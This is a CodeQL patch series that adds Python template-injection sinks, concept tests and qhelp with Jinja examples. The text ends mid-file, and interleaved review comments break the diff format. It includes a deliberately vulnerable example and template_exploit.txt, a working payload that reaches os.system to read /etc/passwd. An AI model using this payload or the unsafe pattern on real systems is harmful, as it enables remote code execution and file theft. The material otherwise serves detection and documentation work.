From: Joe Farebrother Date: Thu, 21 Nov 2024 14:56:44 +0000 Subject: [PATCH 0944/1267] Add concepts tests + some fixes --- .../ql/lib/semmle/python/frameworks/Flask.qll | 7 +++++-- .../ql/lib/semmle/python/frameworks/Genshi.qll | 2 +- .../ql/lib/semmle/python/frameworks/Jinja2.qll | 1 + .../ql/test/experimental/meta/ConceptsTest.qll | 17 ++++++++++++++++- .../frameworks/Genshi/ConceptsTest.expected | 2 ++ .../frameworks/Genshi/ConceptsTest.ql | 2 ++ .../frameworks/Genshi/template_test.py | 9 +++++++++ .../frameworks/Mako/ConceptsTest.expected | 2 ++ .../frameworks/Mako/ConceptsTest.ql | 2 ++ .../frameworks/Mako/template_test.py | 4 ++++ .../frameworks/TRender/ConceptsTest.expected | 2 ++ .../frameworks/TRender/ConceptsTest.ql | 2 ++ .../frameworks/TRender/template_test.py | 4 ++++ .../frameworks/airspeed/ConceptsTest.expected | 2 ++ .../frameworks/airspeed/ConceptsTest.ql | 2 ++ .../frameworks/airspeed/template_test.py | 4 ++++ .../frameworks/bottle/template_test.py | 9 +++++++++ .../frameworks/chameleon/ConceptsTest.expected | 2 ++ .../frameworks/chameleon/ConceptsTest.ql | 2 ++ .../frameworks/chameleon/template_test.py | 4 ++++ .../frameworks/chevron/ConceptsTest.expected | 2 ++ .../frameworks/chevron/ConceptsTest.ql | 2 ++ .../frameworks/chevron/template_test.py | 4 ++++ .../frameworks/django-v2-v3/template_test.py | 17 +++++++++++++++++ .../frameworks/flask/taint_test.py | 8 ++++---- .../frameworks/flask/template_test.py | 16 ++++++++++++++++ .../frameworks/jinja2/ConceptsTest.expected | 2 ++ .../frameworks/jinja2/ConceptsTest.ql | 2 ++ .../frameworks/jinja2/template_test.py | 7 +++++++ 29 files changed, 133 insertions(+), 8 deletions(-) create mode 100644 python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/Genshi/template_test.py create mode 100644 
python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/Mako/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/Mako/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/TRender/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/TRender/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/airspeed/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/bottle/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/chameleon/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/chevron/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/chevron/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/flask/template_test.py create mode 100644 python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected create mode 100644 python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.ql create mode 100644 python/ql/test/library-tests/frameworks/jinja2/template_test.py diff --git a/python/ql/lib/semmle/python/frameworks/Flask.qll b/python/ql/lib/semmle/python/frameworks/Flask.qll index cfb8048c6a1..0e5d6065c47 100644 --- a/python/ql/lib/semmle/python/frameworks/Flask.qll 
+++ b/python/ql/lib/semmle/python/frameworks/Flask.qll @@ -722,10 +722,13 @@ module Flask { } } - /** A call to `flask.render_template_string` as a template construction sink. */ + /** A call to `flask.render_template_string` or `flask.stream_template_string` as a template construction sink. */ private class FlaskTemplateConstruction extends TemplateConstruction::Range, API::CallNode { FlaskTemplateConstruction() { - this = API::moduleImport("flask").getMember("render_template_string").getACall() + this = + API::moduleImport("flask") + .getMember(["render_template_string", "stream_template_string"]) + .getACall() } override DataFlow::Node getSourceArg() { result = this.getArg(0) } diff --git a/python/ql/lib/semmle/python/frameworks/Genshi.qll b/python/ql/lib/semmle/python/frameworks/Genshi.qll index 1e29295b428..8e368391cf7 100644 --- a/python/ql/lib/semmle/python/frameworks/Genshi.qll +++ b/python/ql/lib/semmle/python/frameworks/Genshi.qll @@ -21,7 +21,7 @@ module Genshi { API::moduleImport("genshi") .getMember("template") .getMember("text") - .getMember(["NewTextTemplate", "OldTextTemplate"]) + .getMember(["NewTextTemplate", "OldTextTemplate", "TextTemplate"]) .getACall() } diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll index 9f267915e5c..0d0a8d98921 100644 --- a/python/ql/lib/semmle/python/frameworks/Jinja2.qll +++ b/python/ql/lib/semmle/python/frameworks/Jinja2.qll @@ -24,6 +24,7 @@ module Jinja2 { override DataFlow::Node getSourceArg() { result = this.getArg(0) } } + /** Definitions for modeling jinja `Environment`s. */ module EnvironmentClass { /** Gets a reference to the `jinja2.Environment` class. */ API::Node classRef() { diff --git a/python/ql/test/experimental/meta/ConceptsTest.qll b/python/ql/test/experimental/meta/ConceptsTest.qll index 8ab87e56d1c..40aa9c951b0 100644 --- a/python/ql/test/experimental/meta/ConceptsTest.qll +++ b/python/ql/test/experimental/meta/ConceptsTest.qll 
@@ -663,6 +663,20 @@ module CorsMiddlewareTest implements TestSig { } } +module TemplateConstructionTest implements TestSig { + string getARelevantTag() { result = "templateConstruction" } + + predicate hasActualResult(Location location, string element, string tag, string value) { + exists(location.getFile().getRelativePath()) and + exists(TemplateConstruction tc | + location = tc.getLocation() and + element = tc.toString() and + value = prettyNodeForInlineTest(tc.getSourceArg()) and + tag = "templateConstruction" + ) + } +} + import MakeTest, MergeTests5, MergeTests5>>> + CsrfLocalProtectionSettingTest, + MergeTests3>>> diff --git a/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected new file mode 100644 index 00000000000..a74f2c23cda --- /dev/null +++ b/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.expected @@ -0,0 +1,2 @@ +testFailures +failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.ql new file mode 100644 index 00000000000..b557a0bccb6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/Genshi/ConceptsTest.ql @@ -0,0 +1,2 @@ +import python +import experimental.meta.ConceptsTest diff --git a/python/ql/test/library-tests/frameworks/Genshi/template_test.py b/python/ql/test/library-tests/frameworks/Genshi/template_test.py new file mode 100644 index 00000000000..d585ee1a81e --- /dev/null +++ b/python/ql/test/library-tests/frameworks/Genshi/template_test.py 
@@ -0,0 +1,9 @@ +from genshi.template.text import TextTemplate, NewTextTemplate, OldTextTemplate +from genshi.template.markup import MarkupTemplate + +def test(): + a = TextTemplate("abc") # $ templateConstruction="abc" + a = OldTextTemplate("abc") # $ templateConstruction="abc" + a = NewTextTemplate("abc") # $ templateConstruction="abc" + a = MarkupTemplate("abc") # $ templateConstruction="abc" + return a \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected new file mode 100644 index 00000000000..a74f2c23cda --- /dev/null +++ b/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.expected @@ -0,0 +1,2 @@ +testFailures +failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.ql new file mode 100644 index 00000000000..b557a0bccb6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/Mako/ConceptsTest.ql @@ -0,0 +1,2 @@ +import python +import experimental.meta.ConceptsTest diff --git a/python/ql/test/library-tests/frameworks/Mako/template_test.py b/python/ql/test/library-tests/frameworks/Mako/template_test.py new file mode 100644 index 00000000000..224954cf263 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/Mako/template_test.py @@ -0,0 +1,4 @@ +from mako.template import Template + +def test(): + return Template("abc") # $ templateConstruction="abc" \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected new file mode 100644 index 00000000000..a74f2c23cda --- /dev/null +++ b/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.expected @@ -0,0 +1,2 @@ +testFailures +failures \ No newline at end of file 
diff --git a/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.ql new file mode 100644 index 00000000000..b557a0bccb6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/TRender/ConceptsTest.ql @@ -0,0 +1,2 @@ +import python +import experimental.meta.ConceptsTest diff --git a/python/ql/test/library-tests/frameworks/TRender/template_test.py b/python/ql/test/library-tests/frameworks/TRender/template_test.py new file mode 100644 index 00000000000..f62d33c26d5 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/TRender/template_test.py @@ -0,0 +1,4 @@ +from trender import TRender + +def test(): + return TRender("abc") # $ templateConstruction="abc" \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected new file mode 100644 index 00000000000..a74f2c23cda --- /dev/null +++ b/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.expected @@ -0,0 +1,2 @@ +testFailures +failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.ql new file mode 100644 index 00000000000..b557a0bccb6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/airspeed/ConceptsTest.ql @@ -0,0 +1,2 @@ +import python +import experimental.meta.ConceptsTest diff --git a/python/ql/test/library-tests/frameworks/airspeed/template_test.py b/python/ql/test/library-tests/frameworks/airspeed/template_test.py new file mode 100644 index 00000000000..34d4c29fff6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/airspeed/template_test.py @@ -0,0 +1,4 @@ +from airspeed import Template + +def test(): + return Template("abc") # $ templateConstruction="abc" 
diff --git a/python/ql/test/library-tests/frameworks/bottle/template_test.py b/python/ql/test/library-tests/frameworks/bottle/template_test.py new file mode 100644 index 00000000000..db48cfc4fc9 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/bottle/template_test.py @@ -0,0 +1,9 @@ +import bottle +from bottle import response, request, template, SimpleTemplate + +app = bottle.app() +@app.route('/test', method=['OPTIONS', 'GET']) # $ routeSetup="/test" +def test1(): # $ requestHandler + template("abc") # $ templateConstruction="abc" + SimpleTemplate("abc") # $ templateConstruction="abc" + return '[1]' # $ HttpResponse mimetype=text/html responseBody='[1]' \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected new file mode 100644 index 00000000000..a74f2c23cda --- /dev/null +++ b/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.expected @@ -0,0 +1,2 @@ +testFailures +failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.ql new file mode 100644 index 00000000000..b557a0bccb6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/chameleon/ConceptsTest.ql @@ -0,0 +1,2 @@ +import python +import experimental.meta.ConceptsTest diff --git a/python/ql/test/library-tests/frameworks/chameleon/template_test.py b/python/ql/test/library-tests/frameworks/chameleon/template_test.py new file mode 100644 index 00000000000..ad6d85036ea --- /dev/null +++ b/python/ql/test/library-tests/frameworks/chameleon/template_test.py @@ -0,0 +1,4 @@ +from chameleon import PageTemplate + +def test(): + return PageTemplate("abc") # $ templateConstruction="abc" \ No newline at end of file 
diff --git a/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected new file mode 100644 index 00000000000..a74f2c23cda --- /dev/null +++ b/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.expected @@ -0,0 +1,2 @@ +testFailures +failures \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.ql new file mode 100644 index 00000000000..b557a0bccb6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/chevron/ConceptsTest.ql @@ -0,0 +1,2 @@ +import python +import experimental.meta.ConceptsTest diff --git a/python/ql/test/library-tests/frameworks/chevron/template_test.py b/python/ql/test/library-tests/frameworks/chevron/template_test.py new file mode 100644 index 00000000000..7aff524166d --- /dev/null +++ b/python/ql/test/library-tests/frameworks/chevron/template_test.py @@ -0,0 +1,4 @@ +from chevron import render + +def test(): + return render("abc") # $ templateConstruction="abc" \ No newline at end of file diff --git a/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py b/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py new file mode 100644 index 00000000000..2d25848fde6 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/django-v2-v3/template_test.py 
@@ -0,0 +1,17 @@
+from django.template import Template, engines
+from django.urls import path
+from django.http.response import HttpResponse,
+
+def a(request): # $requestHandler
+ t = Template("abc").render() # $templateConstruction="abc"
+ return HttpResponse(t) # $HttpResponse
+
+def b(request): # $requestHandler
+ # This case is not yet supported
+ t = django.template.engines["django"].from_string("abc") # $MISSING:templateConstruction="abc"
+ return HttpResponse(t) # $HttpResponse
+
+urlpatterns = [
+ path("a", a), # $ routeSetup="a"
+ path("b", b), # $ routeSetup="b"
+]
\ No newline at end of file
diff --git a/python/ql/test/library-tests/frameworks/flask/taint_test.py b/python/ql/test/library-tests/frameworks/flask/taint_test.py
index 227aecbf745..ac8a5a82dc2 100644
--- a/python/ql/test/library-tests/frameworks/flask/taint_test.py
+++ b/python/ql/test/library-tests/frameworks/flask/taint_test.py
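Review bot: `from django.http.response import HttpResponse,` ends in a bare trailing comma, which is a syntax error in Python outside parentheses, so this fixture may not parse as intended. It should read `from django.http.response import HttpResponse`. In `b`, `django.template.engines["django"]` uses the name `django`, which this file never imports (only `engines` is brought in), so the call the `MISSING` annotation documents is not reachable through any import. Use `t = engines["django"].from_string("abc")`, so that a later model for `from_string` would actually match this line.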
@@ -222,25 +222,25 @@ def test_taint(name = "World!", number="0", foo="foo"): # $requestHandler route # render_template_string source = TAINTED_STRING ensure_tainted(source) # $ tainted - res = render_template_string(source) + res = render_template_string(source) # $ templateConstruction=source ensure_tainted(res) # $ tainted # since template variables are auto-escaped, we don't treat result as tainted # see https://flask.palletsprojects.com/en/2.3.x/api/#flask.render_template_string - res = render_template_string("Hello {{ foo }}", foo=TAINTED_STRING) + res = render_template_string("Hello {{ foo }}", foo=TAINTED_STRING) # $ templateConstruction="Hello {{ foo }}" ensure_not_tainted(res) # stream_template_string source = TAINTED_STRING ensure_tainted(source) # $ tainted - res = stream_template_string(source) + res = stream_template_string(source) # $ templateConstruction=source for x in res: ensure_tainted(x) # $ tainted # since template variables are auto-escaped, we don't treat result as tainted # see https://flask.palletsprojects.com/en/2.3.x/api/#flask.stream_template_string - res = stream_template_string("Hello {{ foo }}", foo=TAINTED_STRING) + res = stream_template_string("Hello {{ foo }}", foo=TAINTED_STRING) # $ templateConstruction="Hello {{ foo }}" for x in res: ensure_not_tainted(x) diff --git a/python/ql/test/library-tests/frameworks/flask/template_test.py b/python/ql/test/library-tests/frameworks/flask/template_test.py new file mode 100644 index 00000000000..8d867e14829 --- /dev/null +++ b/python/ql/test/library-tests/frameworks/flask/template_test.py 
@@ -0,0 +1,16 @@
+from flask import Flask, Response, stream_with_context, render_template_string, stream_template_string
+app = Flask(__name__)
+
+@app.route("/a") # $routeSetup="/a"
+def a(): # $requestHandler
+ r = render_template_string("abc") # $ templateConstruction="abc"
+ return r # $ HttpResponse
+
+@app.route("/b") # $routeSetup="/b"
+def b(): # $requestHandler
+ s = stream_template_string("abc") # $ templateConstruction="abc"
+ r = Response(stream_with_context(s)) # $ HttpResponse
+ return r # $ HttpResponse
+
+if __name__ == "__main__":
+ app.run(debug=True)
\ No newline at end of file
diff --git a/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected b/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected
new file mode 100644
index 00000000000..a74f2c23cda
--- /dev/null
+++ b/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.expected
@@ -0,0 +1,2 @@
+testFailures
+failures
\ No newline at end of file
diff --git a/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.ql b/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.ql
new file mode 100644
index 00000000000..b557a0bccb6
--- /dev/null
+++ b/python/ql/test/library-tests/frameworks/jinja2/ConceptsTest.ql
@@ -0,0 +1,2 @@
+import python
+import experimental.meta.ConceptsTest
diff --git a/python/ql/test/library-tests/frameworks/jinja2/template_test.py b/python/ql/test/library-tests/frameworks/jinja2/template_test.py
new file mode 100644
index 00000000000..587de84f621
--- /dev/null
+++ b/python/ql/test/library-tests/frameworks/jinja2/template_test.py
@@ -0,0 +1,7 @@
+from jinja2 import Environment, Template
+
+def test():
+ env = Environment()
+ t = env.from_string("abc") # $ templateConstruction="abc"
+ t = Template("abc") # $ templateConstruction="abc"
+ return t
\ No newline at end of file
From 02f395f5f845e5c11aed8ff988867bd8e9722060 Mon Sep 17 00:00:00 2001
From: Joe Farebrother Date: Thu, 21 Nov 2024 16:51:28 +0000 Subject: [PATCH 0945/1267] Add qhelp --- .../Security/CWE-074/TemplateInjection.qhelp | 30 +++++++++++++++++++ .../src/Security/CWE-074/examples/JinjaBad.py | 19 ++++++++++++ .../CWE-074/examples/JinjaGoodParam.py | 17 +++++++++++ .../CWE-074/examples/JinjaGoodSandbox.py | 21 +++++++++++++ .../CWE-074/examples/template_exploit.txt | 1 + 5 files changed, 88 insertions(+) create mode 100644 python/ql/src/Security/CWE-074/TemplateInjection.qhelp create mode 100644 python/ql/src/Security/CWE-074/examples/JinjaBad.py create mode 100644 python/ql/src/Security/CWE-074/examples/JinjaGoodParam.py create mode 100644 python/ql/src/Security/CWE-074/examples/JinjaGoodSandbox.py create mode 100644 python/ql/src/Security/CWE-074/examples/template_exploit.txt diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp new file mode 100644 index 00000000000..06990a7237b --- /dev/null +++ b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp @@ -0,0 +1,30 @@ + + + +

    + A template from a server templating engine such as Jinja constructed from user input can allow the user to execute arbitrary code using certain template features. It can also allow for cross-site scripting. +

    + + +

    + Ensure that an untrusted value is not used to directly construct a template. + Jinja also provides a SandboxedEnvironment that prohibits access to unsafe methods and attributes, that can be used if constructing a template from user input is absolutely necessary. +

    +
    + +

    In the following case template is used to generate a Jinja2 template string. This can lead to remote code execution.

    + + +

    The following is an example of a string that could be used to cause remote code execution when interpreted as a template:

    + + +

    In the following case, user input is not used to construct the template; rather is only used for as the parameters to render the template, which is safe.

    + + +

    In the following case, a SandboxedEnvironment is used, preventing remote code execution.

    + +
    + +
  • Portswigger : [Server Side Template Injection](https://portswigger.net/web-security/server-side-template-injection)
  • +
    +
diff --git a/python/ql/src/Security/CWE-074/examples/JinjaBad.py b/python/ql/src/Security/CWE-074/examples/JinjaBad.py
new file mode 100644
index 00000000000..0a82135b49b
--- /dev/null
+++ b/python/ql/src/Security/CWE-074/examples/JinjaBad.py
@@ -0,0 +1,19 @@
+from django.urls import path
+from django.http import HttpResponse
+from jinja2 import Template, escape
+
+
+def a(request):
+ template = request.GET['template']
+
+ # BAD: Template is constructed from user input.
+ t = Template(template)
+
+ name = request.GET['name']
+ html = t.render(name=escape(name))
+ return HttpResponse(html)
+
+
+urlpatterns = [
+ path('a', a),
+]
\ No newline at end of file
diff --git a/python/ql/src/Security/CWE-074/examples/JinjaGoodParam.py b/python/ql/src/Security/CWE-074/examples/JinjaGoodParam.py
new file mode 100644
index 00000000000..1d8bb6962f6
--- /dev/null
+++ b/python/ql/src/Security/CWE-074/examples/JinjaGoodParam.py
@@ -0,0 +1,17 @@
+from django.urls import path
+from django.http import HttpResponse
+from jinja2 import Template, escape
+
+
+def a(request):
+ # GOOD: Template is a constant, not constructed from user input
+ t = Template("Hello, {{name}}!")
+
+ name = request.GET['name']
+ html = t.render(name=escape(name))
+ return HttpResponse(html)
+
+
+urlpatterns = [
+ path('a', a),
+]
\ No newline at end of file
diff --git a/python/ql/src/Security/CWE-074/examples/JinjaGoodSandbox.py b/python/ql/src/Security/CWE-074/examples/JinjaGoodSandbox.py
new file mode 100644
index 00000000000..488591c6f83
--- /dev/null
+++ b/python/ql/src/Security/CWE-074/examples/JinjaGoodSandbox.py
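Review bot: `from jinja2 import Template, escape` in JinjaBad.py will not import on Jinja 3.1 or later, where `jinja2.escape` was removed in favour of MarkupSafe; the same import appears in JinjaGoodParam.py and, as `from jinja2 import escape`, in JinjaGoodSandbox.py. Since these files are the documentation examples that readers copy, I would use `from markupsafe import escape` in all three and keep `from jinja2 import Template` for the class. A short comment on the `escape(name)` call, such as `# Template() does not autoescape by default, so the value is escaped here`, would also explain why the manual escaping is there.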
@@ -0,0 +1,21 @@ +from django.urls import path +from django.http import HttpResponse +from jinja2 import escape +from jinja2.sandbox import SandboxedEnvironment + + +def a(request): + env = SandboxedEnvironment() + template = request.GET['template'] + + # GOOD: A sandboxed environment is used to construct the template. + t = env.from_string(template) + + name = request.GET['name'] + html = t.render(name=escape(name)) + return HttpResponse(html) + + +urlpatterns = [ + path('a', a), +] \ No newline at end of file diff --git a/python/ql/src/Security/CWE-074/examples/template_exploit.txt b/python/ql/src/Security/CWE-074/examples/template_exploit.txt new file mode 100644 index 00000000000..607b95bd8d8 --- /dev/null +++ b/python/ql/src/Security/CWE-074/examples/template_exploit.txt @@ -0,0 +1 @@ +{% for s in ().__class__.__base__.__subclasses__() %}{% if "warning" in s.__name__ %}{{s()._module.__builtins__['__import__']('os').system('cat /etc/passwd') }}{% endif %}{% endfor %} From e4e02ec6749947b6f2805482d07ea7d13ac86060 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Thu, 21 Nov 2024 16:59:12 +0000 Subject: [PATCH 0946/1267] Add security severity + fix qhelp --- python/ql/src/Security/CWE-074/TemplateInjection.qhelp | 2 +- python/ql/src/Security/CWE-074/TemplateInjection.ql | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp index 06990a7237b..477d1b0e139 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp +++ b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp @@ -12,7 +12,7 @@
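Review bot: The `# GOOD` comment in JinjaGoodSandbox.py overstates what the sandbox provides: `env.from_string(template)` still renders template text chosen by the requester, and that literal text is emitted unescaped, so the body passed to `HttpResponse(html)` can carry requester-chosen HTML even though `name` is escaped. The help text added in the same commit notes that template injection can also allow cross-site scripting, and the example should not read as if the sandbox closes that off as well. I would reword the comment to `# GOOD (for code execution only): the sandbox blocks unsafe attribute access; the template text is still user-controlled markup`. The example should also either return the result with a non-HTML content type or sanitise the rendered output before it reaches the browser.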

    -

    In the following case template is used to generate a Jinja2 template string. This can lead to remote code execution.

    +

    In the following case, template is used to generate a Jinja2 template string. This can lead to remote code execution.

    The following is an example of a string that could be used to cause remote code execution when interpreted as a template:

    diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.ql b/python/ql/src/Security/CWE-074/TemplateInjection.ql index 125478c801c..2ea68414259 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.ql +++ b/python/ql/src/Security/CWE-074/TemplateInjection.ql @@ -4,6 +4,7 @@ * @kind path-problem * @problem.severity error * @precision high + * @security-severity 9.3 * @id py/template-injection * @tags security * external/cwe/cwe-074 From 4602c5c90545c4d4b59464e4ccad51f0bd75a3da Mon Sep 17 00:00:00 2001 
From: Joe Farebrother Date: Thu, 21 Nov 2024 17:06:25 +0000 Subject: [PATCH 0947/1267] Remove experimental version + qhelp fixes --- .../Security/CWE-074/TemplateInjection.qhelp | 4 +- .../experimental/Security/CWE-074/JinjaBad.py | 19 -- .../Security/CWE-074/JinjaGood.py | 20 --- .../CWE-074/TemplateConstructionConcept.qll | 165 ------------------ .../Security/CWE-074/TemplateInjection.qhelp | 24 --- .../Security/CWE-074/TemplateInjection.ql | 20 --- .../TemplateInjectionCustomizations.qll | 59 ------- .../CWE-074/TemplateInjectionQuery.qll | 18 -- .../CWE-074-TemplateInjection/AirspeedSsti.py | 11 -- .../CWE-074-TemplateInjection/BottleSsti.py | 20 --- .../CWE-074-TemplateInjection/Chameleon.py | 10 -- .../CWE-074-TemplateInjection/CheetahSinks.py | 22 --- .../CWE-074-TemplateInjection/ChevronSsti.py | 24 --- .../DjangoTemplates.py | 41 ----- .../FlaskTemplate.py | 22 --- .../CWE-074-TemplateInjection/Genshi.py | 18 -- .../CWE-074-TemplateInjection/JinjaSsti.py | 30 ---- .../CWE-074-TemplateInjection/MakoSsti.py | 15 -- .../CWE-074-TemplateInjection/TRender.py | 12 -- .../TemplateInjection.expected | 107 ------------ .../TemplateInjection.qlref | 1 - 21 files changed, 2 insertions(+), 660 deletions(-) delete mode 100644 python/ql/src/experimental/Security/CWE-074/JinjaBad.py delete mode 100644 python/ql/src/experimental/Security/CWE-074/JinjaGood.py delete mode 100644 python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll delete mode 100644 python/ql/src/experimental/Security/CWE-074/TemplateInjection.qhelp delete mode 100644 python/ql/src/experimental/Security/CWE-074/TemplateInjection.ql delete mode 100644 python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll delete mode 100644 python/ql/src/experimental/Security/CWE-074/TemplateInjectionQuery.qll delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/AirspeedSsti.py delete mode 100644 
python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/BottleSsti.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Chameleon.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/CheetahSinks.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/ChevronSsti.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/DjangoTemplates.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/FlaskTemplate.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Genshi.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/MakoSsti.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TRender.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp index 477d1b0e139..619d834d1cf 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp +++ b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp @@ -16,10 +16,10 @@

    The following is an example of a string that could be used to cause remote code execution when interpreted as a template:

    - +

    In the following case, user input is not used to construct the template; rather is only used for as the parameters to render the template, which is safe.

    - +

    In the following case, a SandboxedEnvironment is used, preventing remote code execution.

    diff --git a/python/ql/src/experimental/Security/CWE-074/JinjaBad.py b/python/ql/src/experimental/Security/CWE-074/JinjaBad.py deleted file mode 100644 index aaac3ec819e..00000000000 --- a/python/ql/src/experimental/Security/CWE-074/JinjaBad.py +++ /dev/null @@ -1,19 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from jinja2 import Template as Jinja2_Template -from jinja2 import Environment, DictLoader, escape - - -def a(request): - # Load the template - template = request.GET['template'] - t = Jinja2_Template(template) - name = request.GET['name'] - # Render the template with the context data - html = t.render(name=escape(name)) - return HttpResponse(html) - - -urlpatterns = [ - path('a', a), -] diff --git a/python/ql/src/experimental/Security/CWE-074/JinjaGood.py b/python/ql/src/experimental/Security/CWE-074/JinjaGood.py deleted file mode 100644 index a1b60561850..00000000000 --- a/python/ql/src/experimental/Security/CWE-074/JinjaGood.py +++ /dev/null @@ -1,20 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from jinja2 import Template as Jinja2_Template -from jinja2 import Environment, DictLoader, escape - - -def a(request): - # Load the template - template = request.GET['template'] - env = SandboxedEnvironment(undefined=StrictUndefined) - t = env.from_string(template) - name = request.GET['name'] - # Render the template with the context data - html = t.render(name=escape(name)) - return HttpResponse(html) - - -urlpatterns = [ - path('a', a), -] diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll b/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll deleted file mode 100644 index 5144e2ff97b..00000000000 --- 